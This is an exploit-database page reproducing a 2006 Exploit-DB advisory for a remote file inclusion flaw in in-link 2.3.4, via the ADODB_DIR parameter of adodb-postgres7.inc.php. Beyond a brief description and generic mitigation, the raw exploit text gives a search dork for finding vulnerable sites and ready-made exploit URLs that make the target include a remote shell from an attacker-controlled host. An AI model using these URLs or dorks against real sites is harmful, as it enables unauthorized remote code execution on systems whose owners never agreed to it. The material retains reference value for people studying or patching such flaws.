in-link - exploit.company

vendor:

in-link

by:

Saudi Hackrz

N/A

CVSS

N/A

Remote File Inclusion

CWE

Product Name: in-link

Affected Version From: 2.3.4

Affected Version To: 2.3.4

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2006

in-link <=2.3.4 (adodb-postgres7.inc.php) Remote File Inclusion Exploit

in-link 2.3.4 is vulnerable to a remote file inclusion vulnerability. This vulnerability is due to a failure in the application to properly sanitize user-supplied input to the 'ADODB_DIR' parameter of 'adodb-postgres7.inc.php' script. An attacker can exploit this vulnerability to include arbitrary files from remote hosts and execute arbitrary code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the inclusion of malicious files. Additionally, the application should be configured to use the least privilege necessary to perform its function.

Source

Exploit-DB raw data:

#=================================================================
#in-link <=2.3.4 (adodb-postgres7.inc.php) Remote File Inclusion Exploit
#================================================================
#
#Critical Level : Dangerous
#
#By Saudi Hackrz
#
#http://www.in-portal.net/
#http://www.in-portal.net/products/in-link.html
#=================================================================
#Script Name: in-link 2.3.4
#Script <<<<<<<<<<  $$ $$
http://www.bwady.net/script/pafiledb.php?action=download&id=4
#Dork :"by in-link"  or  "Powered by In-Link 2."
#
#=================================================================
#Bug in : adodb-postgres7.inc.php
#        include_once($ADODB_DIR."/adodb-postgres.inc.php");
#includes/adodb/back/adodb-postgres7.inc.php
#
#=================================================================
#
#Exploit :
#--------------------------------
#
#http://sitename.com/[path]/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=http://SHELLURL.COM?
#Or
#http://sitename.com/includes/adodb/back/adodb-postgres7.inc.php?ADODB_DIR=http://SHELLURL.COM?
#
#===============================================================================
#Discoverd By : Saudi Hackrz
#
#Conatact : Saudi.unix[at]hotmail.com
#
#GreetZ : Le CoPrA And All My Frind
#www.S3hr.com

# milw0rm.com [2006-09-04]